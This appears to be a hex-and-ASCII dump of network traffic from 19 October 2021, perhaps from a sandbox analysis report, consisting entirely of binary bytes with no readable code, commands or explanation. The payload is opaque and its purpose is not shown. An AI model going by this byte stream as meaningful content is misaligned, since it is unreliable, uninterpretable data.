4a 16 60 2e c9 cc 55 f2 a2 e4 01 93 05 7f e8 3a 18 87 88 de 77 0f e3 1b d3 fd b8 50 1e 02 17 b5 61 e5 a4 39 ee 12 fc 12 e7 a0 2b 50 09 22 7d e1 32 43 56 d0 e0 f9 24 59 4e b6 17 27
                                                                                                                                                                                Data Ascii: O;FWd1s6+}+-U`r j0da"Mb(FK@]E~v,#D}"GsN(XH`ll`,8XT6@y<K;Qht 08J&TY:^g kmD'Z%@Fb)0U~/J`.U:wPa9+P"}2CV$YN'
                                                                                                                                                                                2021-10-19 05:23:31 UTC1532INData Raw: a4 55 ff e2 90 37 c3 28 ac 15 c8 b8 40 42 cf 3b 21 29 33 21 81 36 c2 d1 9c e4 1c 4d 9f a0 60 b4 8c 57 45 3b 2b ed d6 9a 66 09 1e 7c 5b 03 29 d7 01 d1 22 36 b1 25 8b 31 65 52 37 c6 29 7f bb d5 c2 0b f7 0d a4 48 ca 4c 23 f0 0a 2f ff e6 d9 4c e2 d6 6c 34 4f c5 a9 7f e0 c1 fb fd a5 1e 88 ee 51 03 72 cf e8 94 00 64 61 1c 5f b1 4c b3 19 30 08 f0 19 86 55 48 67 73 1a 53 01 21 0d f6 70 ba 01 4f 39 04 36 ce 0f 80 6f 65 06 ed b2 16 f4 de 90 8b 01 d4 f6 81 47 e9 07 9c 61 66 c0 93 51 37 6e bb 20 32 d1 5f 5f da c0 05 7e 42 20 b3 62 ac 3b 00 83 b0 29 bd 46 ed 3d f6 72 98 fa e0 95 19 27 5c d6 a4 ef e9 09 68 58 83 1f 28 87 e5 c3 45 33 82 b6 7c b2 0c dc 6a 08 79 05 36 16 11 21 43 00 3c cf 72 03 93 3d 50 31 9c 55 2e 90 10 4c 6f c1 36 c2 3e 51 24 4e b1 14 aa 9b 1c 10 00 30
                                                                                                                                                                                Data Ascii: U7(@B;!)3!6M`WE;+f|[)"6%1eR7)HL#/Ll4OQrda_L0UHgsS!pO96oeGafQ7n 2__~B b;)F=r'\hX(E3|jy6!C<r=P1U.Lo6>Q$N0
                                                                                                                                                                                2021-10-19 05:23:31 UTC1548INData Raw: 7d bc 7b 9a af 24 68 17 8d c4 5b ab 8a 12 5a aa 75 32 af 8c aa 28 9d 5e 0c 69 dd cd a3 b5 3b 00 26 b8 e9 fe 7e 46 33 f7 d6 e0 1a d3 16 c0 05 a5 c3 05 ff 6e 29 f0 2d 0f 07 5e a0 6c 8d de 77 01 7d c8 84 83 e7 d1 ee e2 40 ff ea ce c6 48 6a e7 09 f2 78 48 09 11 09 fd 80 35 e2 4d b8 3f 18 3b f7 da 2e 8c f1 2d 11 93 d4 20 18 53 4e 35 cd 2d 1a 5c 57 1a 4a 77 9a 4e 90 ff 68 16 12 57 61 11 53 7e 02 02 28 f0 23 3b 9c 22 50 c8 b7 bf 32 01 74 ff 6b 05 6d 1a 3d 60 7f f8 50 2d 07 8b 49 3c ce d9 f8 05 44 1c 80 6c ea 41 70 cf 7d be 9b 29 c4 ab e8 de 43 cb b4 12 e8 36 34 f2 9f 5d 3e 41 84 4e 26 39 c2 1c 09 44 01 57 9c 37 97 57 3a b8 55 c5 0a a4 b2 4a 6f 01 68 ab 20 02 65 55 bb 1e 1d 93 01 29 62 72 34 0b c1 eb 02 81 15 b4 18 34 2b a2 45 04 7d 55 5d 36 ef b7 28 19 85 db ba
                                                                                                                                                                                Data Ascii: }{$h[Zu2(^i;&~F3n)-^lw}@HjxH5M?;.- SN5-\WJwNhWaS~(#;"P2tkm=`P-I<DlAp})C64]>AN&9DW7W:UJoh eU)br44+E}U]6(
                                                                                                                                                                                2021-10-19 05:23:31 UTC1564INData Raw: 7f f8 24 f1 55 59 5a 54 02 e0 37 23 f9 4a 4a 43 b2 31 8b e6 99 7d ef 88 4d c7 63 b2 30 1f d9 3e a6 13 cf c8 43 45 e6 50 5c 92 0a fe 8b 3f b8 26 15 8a e6 95 24 64 04 56 f0 88 e6 4f 5d ca ff 5b c4 4c f8 c5 a4 fa 22 e8 01 f6 e3 25 db 05 17 c1 37 69 ca 35 0c 31 d6 6e 30 6b 19 3c f1 04 0b c1 80 d1 8b 43 2b 19 72 24 17 d6 31 d0 b1 12 6f 29 8b 2f a6 ac 41 80 02 6a b1 ba 17 de ce c2 c1 28 10 f6 52 bd 94 6e 2f 21 ce 1a 16 f4 90 01 f3 23 14 9d 0f 3a 9d 30 05 89 bd f4 8c ce 0b 80 65 31 d2 fe f1 09 a7 fa 89 8c 74 21 50 f6 cb 8a 7d 8d 7b e4 7e 2d 5d 0d dc 7b 0f 35 df 44 f6 6a 44 8b 0f eb 64 62 ee cc 5f fe 5c be b8 cf eb e4 ce b4 aa 29 f3 3b 26 b0 5d b1 59 c2 e6 cb 54 78 52 91 3e ca 2b ca 4d 26 be 35 c9 56 45 08 c3 06 44 e6 99 7d 41 32 8b 3b b5 28 ac 64 8d eb a8 eb ca
                                                                                                                                                                                Data Ascii: $UYZT7#JJC1}Mc0>CEP\?&$dVO][L"%7i51n0k<C+r$1o)/Aj(Rn/!#:0e1t!P}{~-]{5DjDdb_\);&]YTxR>+M&5VED}A2;(d
                                                                                                                                                                                2021-10-19 05:23:31 UTC1580INData Raw: b0 a0 a6 31 d8 97 59 a3 a8 d0 95 c6 89 1c 29 d7 05 e4 d3 58 03 16 35 09 f8 54 ef 82 d6 cc f4 93 58 e7 95 95 c5 83 04 d8 21 d7 f3 9c 4e e6 9e 26 f2 93 4b c6 7e 4c 0d 74 c9 d7 ec 6b 28 f7 04 2f 16 ea 0d 02 99 4a 04 dd ab e3 fa 15 25 6c 53 22 43 0e 31 cf 2d bc 12 9c a5 8a 32 0e 09 ea 28 20 80 c1 fb 29 13 c7 0d 40 88 4d 31 09 ff 09 c0 01 d7 66 80 82 af 42 2a 80 49 83 62 cf 27 7a 01 95 c4 52 7a 09 b4 fb 4d a6 f9 b4 62 47 d7 be 10 54 b7 a7 b4 52 9d 33 12 78 1e 5d 11 d8 06 13 09 f9 8a 12 a5 08 79 db 11 05 66 ec 66 d0 95 e4 dc 4e 0e 35 c0 ea 8d 82 2b e3 02 4a a3 33 2c c7 d4 65 ff 66 ed de a0 05 05 cb 9c 60 6b 9a 5e 2b 6e df 88 c7 eb 65 c7 32 9a f0 e0 9b 21 f8 48 05 e3 c4 e7 cb 29 2f dd fb e0 d7 2b 97 b1 02 ee 45 d4 15 e7 bc 8a 29 de 0b 16 bf c5 4f af 5e 95 a7 f4
                                                                                                                                                                                Data Ascii: 1Y)X5TX!N&K~Ltk(/J%lS"C1-2( )@M1fB*Ib'zRzMbGTR3x]yffN5+J3,ef`k^+ne2!H)/+E)O^
                                                                                                                                                                                2021-10-19 05:23:31 UTC1596INData Raw: 28 8a 03 a0 b1 52 5d bd b9 25 ca 78 b8 a6 e1 bc 45 31 e1 ef 02 0b 41 a8 7a b7 e2 44 2e c2 42 04 12 f7 bc a6 10 69 04 af 67 cb 58 14 a3 95 dc 86 16 43 8a b2 5f d6 ca 22 05 20 17 bf 5c 38 af f6 76 4c 28 5b ca bf 5b af 31 63 cb 0b 54 0c 40 5d 07 7b 71 62 51 f8 eb 84 95 6a 7a dd 3b 30 b1 f3 40 66 00 31 01 e4 fb 56 d7 f1 21 c3 94 34 bb 19 79 0f d3 88 16 29 f7 a4 ed 0f 95 46 27 d7 be b7 ba 4a bc 2c 4a b6 a9 85 16 01 ba b3 29 62 b2 29 fb 75 de 23 65 cb f2 c8 1f 3a 21 ac 13 c7 5a 74 ff cf e5 10 2a 01 88 0e 45 cb 31 d3 02 01 11 29 db 79 fb 5f 0b 39 ff d7 32 7b d1 8b be 21 cc b4 2c ca b1 27 1a 9c b9 97 57 9a 14 f1 56 af 7b f2 aa 2a e5 36 74 5a bb 52 60 30 b8 28 1a bf b1 6f bf cd 34 63 2a f7 01 c4 d8 77 09 4b ff cc 7f 2b a4 1f 7f 21 b0 df e4 d1 94 2f cf 6b c7 fd 33
                                                                                                                                                                                Data Ascii: (R]%xE1AzD.BigXC_" \8vL([[1cT@]{qbQjz;0@f1V!4y)F'J,J)b)u#e:!Zt*E1)y_92{!,'WV{*6tZR`0(o4c*wK+!/k3
                                                                                                                                                                                2021-10-19 05:23:31 UTC1612INData Raw: 55 0a 52 22 52 98 69 cb 66 18 70 f3 4d d6 ff 9a 7a 7d 31 9b 3b 2b aa 32 17 de 74 a9 cf c9 a5 65 80 13 5b bb 8f 21 5a bf 22 2b 12 5d 94 46 9f 89 a3 51 99 49 f4 4f 44 c6 bb ec ce b0 26 22 96 3e 64 34 02 23 0b 2d e5 66 f1 6b 40 22 44 4d d0 5f 50 ae 31 c6 ef 7d 2b ce 75 5e 9c 84 cb 8a 5a a9 27 09 cf df 1a 30 5b a9 11 63 4a ef 52 52 be a6 19 15 05 50 44 22 40 0b 30 10 09 c7 94 74 3e 2b 13 3f df 3e d7 16 ef a5 8b a1 12 cf ca 64 8d ba b9 25 92 f5 cc 3d 89 8e 31 d4 66 89 01 85 fb cf ec dc 03 ea 39 b9 f7 67 e2 df e5 c0 8b ef 29 c5 15 88 f7 95 8e 29 13 49 ff d9 1e a5 19 2a 21 fa 58 26 eb 2f ac de cf 01 b7 8d 75 e0 d6 09 f4 8b 5f 1e bd 9f 85 ef 28 74 06 17 eb b0 d9 e7 bd 6d ad 09 c7 3b d9 ab a5 57 62 79 1c b1 26 c2 04 7a c9 0f 64 5a 18 c6 94 5a c8 3d 0c 3f dd 74 77
                                                                                                                                                                                Data Ascii: UR"RifpMz}1;+2te[!Z"+]FQIOD&">d4#-fk@"DM_P1}+u^Z'0[cJRRPD"@0t>+?>d%=1f9g))I*!X&/u_(tm;Wby&zdZZ=?tw
                                                                                                                                                                                2021-10-19 05:23:31 UTC1623INData Raw: 93 d1 57 3e 29 2c a9 40 08 58 39 68 6c 97 d3 54 ae 90 31 30 41 ab 8c bd 5e 58 54 ac ad 16 29 fe 5f af 9d 2b 6a b8 23 c9 59 96 e0 6f 83 0c 96 be 22 84 14 99 3d 8f 51 c4 56 52 6a bd 2a 5a ac f5 42 19 cb 5b d5 e6 2c ac aa b5 51 68 70 2d a2 00 55 8d 3b 05 68 0d f5 7f 3e 01 c8 51 07 22 dd dd a0 82 24 d7 66 8b 51 be 27 3f f1 6f 23 4d 04 79 26 f7 7f c5 c5 02 9d 54 66 6b 8f f0 69 5e 81 ce 32 40 9c 37 5e d7 ab 8f 47 5a ec ca 96 ab 51 d2 86 4f fc 2e b8 05 00 98 60 f5 5a 2d 42 d7 df 75 6d 0a 9b 82 ff 7a 88 14 05 07 75 a3 11 40 c8 1c 29 5a f0 f8 aa a5 ab 8b a0 dd 2d 5c f1 72 2b e5 55 aa ee 00 b5 55 00 84 09 bb 72 27 2d 7b 0c 01 f4 7b 05 97 76 5d 3e 34 c3 35 0f 19 bf 7a 5b a1 99 2f 22 a7 60 20 58 b5 d1 b5 aa 64 b5 5a fe 43 40 9a 9c f5 d9 78 ed 43 31 2e 48 88 52 b5 71
                                                                                                                                                                                Data Ascii: W>),@X9hlT10A^XT)_+j#Yo"=QVRj*ZB[,Qhp-U;h>Q"$fQ'?o#My&Tfki^2@7^GZQO.`Z-Bumzu@)Z-\r+UUr'-{{v]>45z[/"` XdZC@xC1.HRq
                                                                                                                                                                                2021-10-19 05:23:31 UTC1639INData Raw: d4 c5 eb 66 60 54 4c a8 af b1 f5 c6 14 00 e3 f3 9f a2 77 0b 98 b7 17 08 19 9c b2 bb a2 05 37 10 08 a0 5b 89 1a 86 ca 10 ee ba 52 96 7a 97 57 3b 1e cd fc 05 a2 39 df 94 44 5a 3a be 29 67 60 3b 0e 97 5d 95 fb ad 75 14 ff 09 e1 e9 ce a7 8e d0 a5 3d a6 ec 2f 36 9e 60 0a a1 bf 12 c0 c0 5e 24 26 cf 9e 12 a8 fe d1 29 19 6d d8 7d fb 41 ff 6f ac b4 88 23 82 45 39 fa ff d5 51 65 3d 80 53 8d 9e ec 79 a1 91 07 4b 29 1f 9c 10 01 2e da 25 21 3d 86 09 86 45 24 c8 c8 09 72 91 77 0e 4d cc 1b 08 52 87 ac 7a 23 04 b1 4c 38 49 3d c6 09 ce 4f 38 61 d3 09 48 63 1f b3 48 09 8a 86 28 63 8f 09 c2 fe 30 48 c7 09 cc 17 21 e0 d1 88 7a c4 70 1e 44 7f cc 66 90 58 d1 09 20 26 e3 44 2b 0c 40 6e 11 88 06 91 81 0b 12 10 24 15 4c d6 49 db c6 09 92 23 78 61 97 09 a7 1d 15 b0 f8 09 ee e4 22
                                                                                                                                                                                Data Ascii: f`TLw7[RzW;9DZ:)g`;]u=/6`^$&)m}Ao#E9Qe=SyK).%!=E$rwMRz#L8I=O8aHcH(c0H!zpDfX &D+@n$LI#xa"
                                                                                                                                                                                2021-10-19 05:23:31 UTC1655INData Raw: 26 5b 31 fc 0c f2 cf 38 f6 9e 12 36 3c 7f fb 9c c8 30 bf fb a9 e1 0f b6 3e 3e ad a2 a4 0f 4e 33 54 bc b2 39 55 59 96 c5 a8 fd 38 c8 4f 89 29 38 14 c6 97 de cf 70 61 54 2d 85 16 f4 c3 61 fd 07 01 d2 5f 7b 0e 49 90 45 d2 28 97 de 0d 72 65 62 cc 68 ff 9d 7f 15 cb 38 4d 44 d4 9e a5 bf ca 75 89 19 7f 45 cb ab 60 44 0a 99 96 7b a2 b3 d7 ab 2d c7 00 a1 57 86 cf 5f 4e ca 5c 27 1a 7f 34 b3 9d 54 03 54 bd d1 aa 65 e0 2a 80 55 a4 62 7a c9 33 14 a4 f2 37 9d 77 be e5 05 27 fe 2f a6 3a fa 8f ce 27 85 75 cd ec 09 29 30 57 c7 31 c9 dd f9 e3 69 b9 0d 03 ea 94 cb 2b 01 31 61 81 07 25 a0 29 19 63 0f 92 56 26 fb 29 5f fb d0 f2 e9 dc 9d 41 8a ef 2b b8 97 b7 ce 87 dd 01 4a ed 39 1f 0a 89 f9 09 02 b2 d6 94 3e e0 17 9d 5e c7 54 f2 89 4e eb ae 9e fb 25 33 fc a5 02 e5 a3 93 62 df
                                                                                                                                                                                Data Ascii: &[186<0>>N3T9UY8O)8paT-a_{IE(rebh8MDuE`D{-W_N\'4TTe*Ubz37w'/:'u)0W1i+1a%)cV&)_A+J9>^TN%3b
                                                                                                                                                                                2021-10-19 05:23:31 UTC1671INData Raw: 17 21 11 4c 26 f9 48 5f 20 84 39 c2 83 e2 2b 24 f3 53 79 a0 c8 09 42 f8 eb 39 1a 7a 0d 2f a0 48 3d 5c 1b 55 a5 3a 1d 1c 38 30 02 38 43 0f 5b c1 eb 7f c1 68 ef e2 b8 0a 81 69 bd 3a 56 3d 7b 43 17 8b e5 9d 56 11 e7 85 db b8 aa ea 17 cf 00 be d3 cd 7e 7f f7 97 f0 f6 3a 2d 32 00 80 89 f2 5e 01 c2 53 99 63 a0 be 09 eb 1c 8d ff 89 78 df 88 91 08 82 0b 5b 5a 53 62 e5 cc a3 a4 64 84 4b 8d e6 1e be 84 22 ff 1e c0 51 13 3c ef 04 1d c1 ee 03 46 ee c0 77 cb cd 7d ec e6 09 f5 61 3f 7e 01 1f d0 41 1d d8 29 ce 60 59 9a 35 77 bf 6f f2 f3 d0 ba 08 0b 5e e9 74 33 5a 26 07 58 45 73 b4 75 89 a4 02 6b 50 6e d5 82 ac 07 06 2d e2 b6 e5 40 72 f0 05 a1 07 5e 22 b9 3d 56 24 1c 62 47 4a b2 fe 60 4e c1 92 32 ff 08 1c ae f1 91 58 68 06 4b 12 ff 75 c2 55 00 95 6b 08 9f 57 04 2d 3d e4
                                                                                                                                                                                Data Ascii: !L&H_ 9+$SyB9z/H=\U:808C[hi:V={CV~:-2^Scx[ZSbdK"Q<Fw}a?~A)`Y5wo^t3Z&XEsukPn-@r^"=V$bGJ`N2XhKuUkW-=
                                                                                                                                                                                2021-10-19 05:23:31 UTC1687INData Raw: 2d 71 c7 51 28 e9 bc 52 4c 02 ab 2e dd 1b d2 7a a0 4e df be 9c 9e 4c b6 ef e9 fd 98 5c 29 df 0a 31 c1 21 f7 d3 2f 16 a6 21 e9 80 04 ee 01 d9 ef ad 63 8b 0f c5 89 27 b2 1d cc a3 a6 c2 d2 a2 ab a2 94 48 61 16 09 c7 fb 60 e8 ee 01 cf bc 03 e4 29 fc 7c de 17 fb ca be 7c 25 f2 a5 73 77 ad 76 d1 2f 45 8f 1c 0d 10 08 1a 8a 16 88 70 d7 9d 76 5e 6f 9d ca 31 c8 28 84 80 ea cb f2 d4 10 76 02 16 2d f0 2d 1d 79 9b d3 12 0d ac af a5 ba 83 e6 c8 4b ad 28 ce 2d 5f ca 62 7d 1c f9 c3 69 f5 d9 c6 60 2b 0e 2d 01 be 09 59 05 3b e8 f2 a4 ed ff 90 b7 c5 0d 28 bc ee d2 f8 25 c9 e9 10 69 2d 0f ac e7 82 a1 5f aa f8 4f 52 d0 69 91 b5 48 10 a5 d1 fe 89 1e 35 b1 e8 1a 12 2d b0 b7 09 f8 2f b8 01 ba 2e 8b 1d 5d 9c 9b 82 f2 d9 a0 a8 06 2f 25 ca 9a a9 d9 2b 9f d0 e5 91 05 f8 ad 76 98 89
                                                                                                                                                                                Data Ascii: -qQ(RL.zNL\)1!/!c'Ha`)||%swv/Epv^o1(v--yK(-_b}i`+-Y;(%i-_ORiH5-/.]/%+v
                                                                                                                                                                                2021-10-19 05:23:31 UTC1703INData Raw: b2 07 59 5f 76 82 7c 16 5c 56 52 fc 96 8b 5a d4 fc 49 7f 51 9e 24 0c 4a 87 3b 0a 6b 8e 62 15 ad f3 38 16 57 fc 6a b2 5b 5f 76 ae 56 48 51 47 07 46 09 6d 47 60 59 5f 50 b8 1f 8f de fc c0 35 c9 d7 d1 16 31 3c c1 58 d0 3c 59 5e 55 b3 a3 6e 87 11 5a f3 ff 5b e4 65 b7 d6 1d e8 07 60 78 b5 80 09 7f 24 f7 df 85 af 58 bf f0 d4 e8 26 5b fc e1 57 2f bf 3d ba 03 85 56 4b b2 fa 94 97 99 87 a3 83 ae 2d 79 b3 46 53 bd 05 e6 5f f1 0f 5d bf 25 6e 10 fa 0c 16 57 55 fd 5a 9f 28 99 a2 c0 00 2f 56 55 68 ac 16 e7 9d 4c ec e2 a5 be 60 3f 59 53 54 60 5b c0 de 1f 75 6d 01 2d 13 e3 fe 5f 35 f0 c4 fd 37 07 25 0b f6 f7 7b 20 d8 2d f4 1c 00 bd 3f 35 05 1f bf 85 01 2f c3 58 51 24 6b 7e bc 50 68 65 00 8a fb 5f 5a 55 bd d9 e6 03 27 67 31 ea 5d 4a 88 56 be 98 c0 a0 77 f7 de 4e 81 1d ce
                                                                                                                                                                                Data Ascii: Y_v|\VRZIQ$J;kb8Wj[_vVHQGFmG`Y_P51<X<Y^UnZ[e`x$X&[W/=VK-yFS_]%nWUZ(/VUhL`?YST`[um-_57%{ -?5/XQ$k~Phe_ZU'g1]JVwN
                                                                                                                                                                                2021-10-19 05:23:31 UTC1719INData Raw: dd b4 cc a3 7e 25 76 05 00 41 f8 48 8d 63 2a 24 f0 00 94 d6 55 71 67 0a f2 92 1e 93 09 7a c0 19 d8 06 16 c5 d4 07 44 52 1c 03 70 d0 45 08 4e 96 71 b0 77 17 00 73 93 1a b1 71 f2 bb 30 e4 e4 07 4c 3b 82 f0 1f 93 da d4 aa 8f 77 60 a9 f1 f2 4c ff 40 dd 85 97 82 48 c7 9d b1 80 a2 08 c1 55 d8 23 90 98 58 7c 53 4a d4 b8 8a 02 5b 24 94 c9 34 dc 58 05 32 62 03 84 56 fb 21 fb 48 47 92 14 08 a0 8d 16 64 4b 10 3d bb 80 61 52 bc c9 38 93 04 00 69 98 eb 5b 74 b9 92 2c 17 01 6c 02 c1 66 2b 9c 56 17 1c b2 32 40 1b dd 01 68 e9 53 68 34 b5 ec 30 e2 02 ba 6d 98 fa c3 14 47 ca 0b 87 30 8d 7d 33 c0 00 27 c2 a1 c7 4b dd 96 32 1a f5 76 35 54 40 75 c8 71 f7 f9 6b 70 38 1a 70 09 7f fb 09 06 ff 8e 8a b1 c8 f6 61 c8 88 e9 10 8b 1c e2 38 70 b7 1e 28 10 49 1a 0b d3 eb 76 21 d4 31 7d
                                                                                                                                                                                Data Ascii: ~%vAHc*$UqgzDRpENqwsq0L;w`L@HU#X|SJ[$4X2bV!HGdK=aR8i[t,lf+V2@hSh40mG0}3'K2v5T@uqkp8pa8p(Iv!1}
                                                                                                                                                                                2021-10-19 05:23:31 UTC1735INData Raw: ae a2 3f 52 0b 1f 65 cc 52 2a ee e3 68 0f cd a2 64 48 3c 49 ff 34 90 25 81 c6 5d 45 84 97 ee e2 68 93 fe 39 7f 5f 2f 7f d4 2f 51 4f d5 42 e8 cd be 6b 3f db 45 a2 65 bd 94 30 84 6a 1c e9 31 be 27 d7 1e 0c f4 59 71 ff 84 9f 67 f0 a7 a9 2e f6 f0 89 80 f6 55 4c 38 f4 f9 df 14 c1 d5 0f 39 40 21 48 28 90 9d d9 44 07 9a 2b 08 04 31 40 4e 05 cd a6 44 ee fd 06 d1 47 24 74 d3 74 f6 3a 5e b7 07 b6 17 23 d6 aa e2 17 d6 39 db 85 ce b9 9e 14 69 49 78 13 22 05 ef 98 f8 e8 2d 66 f7 94 36 25 20 68 d4 9c 60 3b 23 07 4a d7 4c e8 4f cf d4 8d 16 d1 3a d3 58 b1 e5 af 56 9a f7 42 16 3a 55 f8 ea cd 36 f6 c0 28 5d 03 3f 5f d3 82 d1 c6 90 7b e9 c1 4a d5 a0 72 d8 5f 58 bc 04 14 29 49 a1 7f 5a 85 e8 22 40 01 da 24 b9 60 db 04 4e 19 54 ee 9a da 93 fb da fc 82 ef 81 c7 18 2f d0 10 76
                                                                                                                                                                                Data Ascii: ?ReR*hdH<I4%]Eh9_//QOBk?Ee0j1'Yqg.UL89@!H(D+1@NDG$tt:^#9iIx"-f6% h`;#JLO:XVB:U6(]?_{Jr_X)IZ"@$`NT/v
                                                                                                                                                                                2021-10-19 05:23:31 UTC1751INData Raw: 16 12 10 0a ed 2c d3 a9 0d 54 3c 68 09 dc eb 1b 21 f4 c1 72 dd ec bf 40 f5 2c b3 87 ad de 52 25 56 73 54 9d 54 98 72 77 ef 1d e9 d7 45 a8 4b 5f b6 1c 06 68 f0 3b 75 46 a5 9d f9 38 89 fb 5f 75 16 4e 9d 6c 02 bf 59 74 72 b8 f2 53 57 83 ed af c0 c9 4c 75 a7 1f c1 d1 87 cc b1 07 46 e6 1c e5 a3 d2 c9 d5 1f ff 38 33 31 5f 32 e3 20 40 0b 5f 40 7e fd d1 60 c2 12 93 5e da a0 48 20 36 02 ae a5 a2 2b 08 75 4c ef a0 8c 15 ba c9 70 e9 e1 cf 22 70 fd 25 39 ab 48 3f fa 4e f9 19 86 cd a7 8c 01 56 47 83 b8 af ba 92 38 4d 22 d2 05 aa a6 c3 a7 41 eb cf 81 0c d1 34 29 1e 58 25 40 0b 81 d1 4f 25 09 30 78 ff 9f 73 03 8c 4b fb c0 c9 f8 d8 31 ae 03 19 2b b6 80 48 cc 45 20 49 40 e2 0c 1c 5b 93 08 24 6c 18 e1 8f b4 c8 98 e3 00 11 e2 4e 68 73 c1 17 24 02 3e 28 8a 1a 5c 34 75 c5 37
                                                                                                                                                                                Data Ascii: ,T<h!r@,R%VsTTrwEK_h;uF8_uNlYtrSWLuF831_2 @_@~`^H 6+uLp"p%9H?NVG8M"A4)X%@O%0xsK1+HE I@[$lNhs$>(\4u7
                                                                                                                                                                                2021-10-19 05:23:31 UTC1767INData Raw: ec 77 38 67 f7 99 0f 00 87 33 41 f3 ff e9 b5 5f 75 f6 90 1d 37 97 f8 ba b1 e3 a7 f7 7e e8 49 f1 a1 83 af 58 fe 15 40 35 f1 fa ff 5f 6f ac c4 86 fe 87 48 bd f0 5f 9d f7 16 d1 1a f7 41 99 b2 75 d1 b7 41 5b 68 38 45 a2 18 ac f0 04 0c 33 89 64 14 87 82 e0 59 4d 52 b1 7c 07 7e 8e 5e 49 8b cb 33 16 57 4b 29 ee 28 d8 03 09 c9 9d 73 58 47 a4 af 54 c0 54 42 1a 85 2b 19 ee 71 3e 03 1e 3a ac eb a5 8a af 02 09 ab 95 56 6d f5 1c 32 47 92 02 c3 20 37 24 23 77 fe 9b 5a 59 29 cb d6 54 ec 24 31 5b 60 b3 56 13 79 84 95 37 bf 88 f9 09 4e 3a fa ca 6a 8e 0c 1c 23 51 06 c3 84 64 e3 99 91 af 2e c1 6a da f5 1c cc bb 80 a7 55 ba 56 f5 1e c7 42 1e f5 8b 6c 00 e3 2f 73 68 6f 77 63 e6 64 6a 65 21 cf 07 ea cf 90 d0 5f 93 dc c4 00 f4 6d 46 86 85 63 84 c5 01 bb 4e f1 c2 e6 61 10 20 24
                                                                                                                                                                                Data Ascii: w8g3A_u7~IX@5_oH_AuA[h8E3dYMR|~^I3WK)(sXGTTB+q>:Vm2G 7$#wZY)T$1[`Vy7N:j#Qd.jUVBl/showcdje!_mFcNa $
                                                                                                                                                                                2021-10-19 05:23:31 UTC1783INData Raw: d6 b4 fe 38 e3 e2 09 4a d6 c7 f9 a3 35 68 fd 00 0c b4 f5 89 6e ae 6f 8f 4f 86 e2 16 c2 88 6b fe 39 5e 24 a7 65 04 60 e4 90 b8 6f 03 b6 04 3c 04 1d 9c d6 09 fe b7 0f 1d c0 5e 4f 87 fb 85 56 39 ff f6 c2 87 7a d5 09 5d 7b 10 58 a0 7f a2 c8 4f 29 02 31 bb 68 bf e0 bf 38 d2 00 ab e3 c4 4a 3f a5 06 d4 a2 c5 5d e6 e0 c7 18 da 6e e9 fc 1a c0 7e 6f aa 8d c0 18 66 85 78 1d 03 09 91 89 a4 09 5e 63 0a 26 dc d6 3b 0e ff e9 7b 5b 2e a8 cc 2e 0f e0 ee 61 19 ec 36 1a 18 c0 f0 29 e2 e8 64 58 9e 6d ec 02 22 91 09 57 a6 ef cd 70 52 13 2b 01 26 bf 0c b0 58 f0 13 a0 bc 94 2a 00 29 ae bc bf 5b 3c 82 cc 07 c7 66 e9 1d a0 2c 80 1a 5c 87 e7 1d 38 1f 80 f9 4a ce 7a 26 61 7f 71 37 37 79 9e 53 1c 2f 0e 0a c7 53 65 25 bf 8a b8 a3 ac 07 85 b8 ce bc e3 a8 07 b7 c5 7c 82 6a 88 c2 28 74
                                                                                                                                                                                Data Ascii: 8J5hnoOk9^$e`o<^OV9z]{XO)1h8J?]n~ofx^c&;{[..a6)dXm"WpR+&X*)[<f,\8Jz&aq77yS/Se%|j(t
                                                                                                                                                                                2021-10-19 05:23:31 UTC1799INData Raw: 55 07 be 3b ba c5 28 f0 bd b2 92 5a 00 b4 2b 04 6a b3 5c a7 ff 00 d7 c2 31 cf d0 b5 8b 9e 01 d9 2c 1d ae de 5b b0 f8 64 9b 00 26 f2 63 ec 9c a3 6a 75 01 0a 93 6d 02 a9 06 09 ec 3f 36 00 0e eb 85 67 07 72 13 57 b8 f7 00 82 4a bf 95 14 7a b8 e2 00 ae 2b b1 7b 38 1b b6 0c 00 9b 8e d2 92 0d be d5 e5 00 b7 ef dc 7c 21 df db 0b 7f d4 0e d3 86 42 e2 c0 f1 f8 b3 dd 68 00 6e 83 da 1f cd 16 be 81 00 5b 26 b9 f6 e1 77 b0 6f e6 47 09 b7 18 e6 5a 80 7e 70 6a 0f ff 00 ca 3b 06 66 5c 0b 01 11 f2 9e 01 65 8f 69 ae 62 f8 d3 e4 6b 61 98 c5 00 6c 16 78 e2 0a a0 ee d2 00 0d d7 54 83 04 4e c2 b3 00 03 39 61 26 67 a7 f7 16 00 60 d0 4d 47 69 49 db 77 00 6e 3e 4a 6a d1 ae dc 5a 00 d6 d9 66 0b df 40 f0 3b 1f d8 37 53 80 bc a9 c5 9e bb de 00 7f cf b2 47 e9 ff b5 30 1c 1c f2 bd 43
                                                                                                                                                                                Data Ascii: U;(Z+j\1,[d&cjum?6grWJz+{8|!Bhn[&woGZ~pj;f\eibkalxTN9a&g`MGiIwn>JjZf@;7SG0C
                                                                                                                                                                                2021-10-19 05:23:31 UTC1815INData Raw: d2 f3 e6 5e bb 3a 67 25 57 d9 fe 04 07 5f 29 bf 8f 48 da 21 40 5b 03 e6 2f 9d 7f 75 0e a8 92 0d 86 ff 03 d8 f2 04 f2 79 16 e7 01 d3 fa 2d 50 6e 2d da 52 c1 54 94 18 91 57 e9 f5 1f 68 6b 62 07 7f 47 4d 4b d7 e6 6c 9d cc 82 b7 27 de ec 49 f1 e7 c0 50 b8 0b 82 00 bf 18 f7 d0 c1 e8 06 35 7c 49 07 b6 7b 05 0e 7e d7 73 50 38 c8 dc 13 12 01 c5 58 f9 16 84 74 ee f0 54 32 c0 58 b9 85 a2 ed dc 25 f5 1b e0 2c 9f 1c 7d e4 7e 49 08 11 a4 bc 43 26 94 11 6e 3e 7c 7d 2f c2 05 5c 30 ca 44 40 22 4c 03 80 b5 86 6c 95 14 00 e0 1b f2 6c b9 e8 68 4e 4a f4 28 be 76 d2 19 24 0e fb d9 68 00 ea 68 b2 f4 27 09 5d db ee 68 a6 ca 90 04 8b 7f 2e 3a 42 cc 4e d0 79 d7 3c aa 6c 1a 73 50 b3 10 7d 4e 31 8c 5e 1d 52 09 68 a1 88 54 75 af fa 01 5c 3d f0 55 6a cd 2b 3e 69 c3 7a 8b a0 92 fe 38
                                                                                                                                                                                Data Ascii: ^:g%W_)H!@[/uy-Pn-RTWhkbGMKl'IP5|I{~sP8XtT2X%,}~IC&n>|}/\0D@"LllhNJ(v$hh']h.:BNy<lsP}N1^RhTu\=Uj+>iz8
